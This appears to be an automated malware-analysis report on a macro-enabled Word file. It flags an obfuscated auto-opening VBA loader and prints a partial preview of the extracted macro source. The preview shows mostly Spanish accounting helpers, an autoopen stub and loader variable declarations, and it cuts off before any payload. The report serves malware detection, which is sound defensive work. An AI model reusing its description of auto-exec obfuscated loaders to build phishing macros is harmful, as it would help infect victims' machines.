Verdict: MALICIOUS
Risk Score: 362
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
This OOXML document contains a highly obfuscated VBA macro loader, indicated by multiple critical heuristic firings including 'OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER' and ClamAV detections. The 'autoopen' subroutine likely triggers the execution of malicious code, which is designed to download and execute a second-stage payload. The presence of VBA macros and the AutoOpen function strongly suggests a spearphishing attachment attack vector.
Heuristics (8)
- ClamAV: Doc.Macro.ObfuscatedData-6136276-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Macro.ObfuscatedData-6136276-0
- VBA project inside OOXML [medium, OOXML_VBA, 5 related findings]: Document contains a VBA project (VBA macros present)
- Obfuscated auto-exec VBA loader [critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER]: Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
- AutoOpen macro [high, OLE_VBA_AUTOOPEN]: AutoOpen macro
- CreateObject call [high, OLE_VBA_CREATEOBJ]: CreateObject call
- CallByName call [high, OLE_VBA_CALLBYNAME]: CallByName call
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All twelve URLs below were found in document text (OOXML body / shared strings); they are the standard OOXML/WordprocessingML XML namespace URIs of the document markup itself, not destinations reached by the macro.
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas
  - http://schemas.openxmlformats.org/markup-compatibility/2006
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships
  - http://schemas.openxmlformats.org/officeDocument/2006/math
  - http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main
  - http://schemas.microsoft.com/office/word/2010/wordml
  - http://schemas.microsoft.com/office/word/2010/wordprocessingGroup
  - http://schemas.microsoft.com/office/word/2010/wordprocessingInk
  - http://schemas.microsoft.com/office/word/2006/wordml
  - http://schemas.microsoft.com/office/word/2010/wordprocessingShape
Extracted artifacts (2)
Files carved from inside the sample during analysis.

Artifact 1: macros.bas
- Kind: vba-macro
- Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
- Size: 27982 bytes
- SHA-256: 0207304178dcd5c2819a10d32b55665891861d0c82ef2f24551d9f24ebf832b9
Preview script (first 1,000 lines of the extracted script; several modules are concatenated by the extractor, each starting with its Attribute VB_Name line):

```vba
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Public Function EjecutaSQL(ByRef SQL As String) As Boolean
    EjecutaSQL = False
    On Error Resume Next
    Conn.Execute SQL
    If Err.Number <> 0 Then
        Err.Clear
    Else
        EjecutaSQL = True
    End If
End Function
Public Function DirectorioEAT() As Boolean
    On Error GoTo EDirecEAT
    DirectorioEAT = False
    If Dir("C:\AEAT", vbDirectory) = "" Then
        MsgBox "No se encuentra la carpeta de la agencia tributaria. ( C:\AEAT )", vbExclamation
    Else
        DirectorioEAT = True
    End If
    Exit Function
EDirecEAT:
    Err.Clear
End Function
' Auto-exec entry point flagged by OLE_VBA_AUTOOPEN. It calls EjecutaSQLDo,
' which is not defined anywhere in the previewed portion of the source.
Sub autoopen()
    EjecutaSQLDo 0.4, 5, -0.6
End Sub
Public Function EstaLaCuentaBloqueada(ByRef codmacta As String, Fecha As Date) As Boolean
    Dim i As Integer
    EstaLaCuentaBloqueada = False
    If vParam.CuentasBloqueadas <> "" Then
        i = InStr(1, vParam.CuentasBloqueadas, codmacta & ":")
        If i > 0 Then
            If Fecha >= CDate(Mid(vParam.CuentasBloqueadas, i + Len(codmacta) + 1, 10)) Then EstaLaCuentaBloqueada = True
        End If
    End If
End Function
Public Sub CerrarRs(ByRef Rsss As String)
    On Error Resume Next
    Rsss.Close
    If Err.Number <> 0 Then Err.Clear
End Sub
Public Function SerieNumeroFactura(Posiciones As Integer, Serie As String, Numerofactura As String)
    Dim i As Integer
    Dim Cad As String
    i = Posiciones - Len(Numerofactura) - Len(Serie)
    If i <= 0 Then
        Cad = Right(Numerofactura, Posiciones - Len(Numerofactura))
    Else
        Cad = String(i, "0") & Numerofactura
    End If
    SerieNumeroFactura = Serie & Cad
End Function
Public Function EsEntero(TEXTO As String) As Boolean
    Dim i As Integer
    Dim C As Integer
    Dim L As Integer
    Dim res As Boolean
    res = True
    EsEntero = False
    If Not IsNumeric(TEXTO) Then
        res = False
    Else
        C = 0
        L = 1
        Do
            i = InStr(L, TEXTO, ".")
            If i > 0 Then
                L = i + 1
                C = C + 1
            End If
        Loop Until i = 0
        If C > 1 Then res = False
        If C = 0 Then
            L = 1
            Do
                i = InStr(L, TEXTO, ",")
                If i > 0 Then
                    L = i + 1
                    C = C + 1
                End If
            Loop Until i = 0
            If C > 1 Then res = False
        End If
    End If
    EsEntero = res
End Function
Attribute VB_Name = "Module6"
Public Sub NombreSQL(ByRef CADENA As String)
    Dim J As Integer
    Dim i As Integer
    Dim Aux As String
    J = 1
    Do
        i = InStr(J, CADENA, "
        If i > 0 Then
            Aux = Mid(CADENA, 1, i - 1) & "\"
            CADENA = Aux & Mid(CADENA, i)
            J = i + 2
        End If
    Loop Until i = 0
End Sub
Public Function DevNombreSQL(CADENA As String) As String
    Dim J As Integer
    Dim i As Integer
    Dim Aux As String
    J = 1
    Do
        i = InStr(J, CADENA, "
        If i > 0 Then
            Aux = Mid(CADENA, 1, i - 1) & "\"
            CADENA = Aux & Mid(CADENA, i)
            J = i + 2
        End If
    Loop Until i = 0
    DevNombreSQL = CADENA
End Function
' Module2 declares the global objects, string arrays and string-builder helper
' of the obfuscated loader; the preview is truncated before its decoder body.
Attribute VB_Name = "Module2"
Public Result__1 As Object
Public Freddy_Result As Object
Public Result__3 As Object
Public MassiveA() As String
Public Result__4 As String
Public Result__Warning As String
Public Result_sedming As Object
Public Constant_4 As String
Public constans_Result() As String
Const INTERVAl_MILLIS_DO_EVENTS As Long = 100
Public Function newStringBuilder() As String
    newStringBuilder = ""
End Funct
```
... (truncated)
Artifact 2: vbaProject_00.bin
- Kind: vba-project
- Source: OOXML VBA project: word/vbaProject.bin
- Size: 76288 bytes
- SHA-256: f6ed7cedb24df52fefae87ecc496eea7abfc450ff1fcc4804c04005a530c4809
- Detection (ClamAV): Doc.Macro.ObfuscatedData-6136276-0
- Obfuscation or payload: unlikely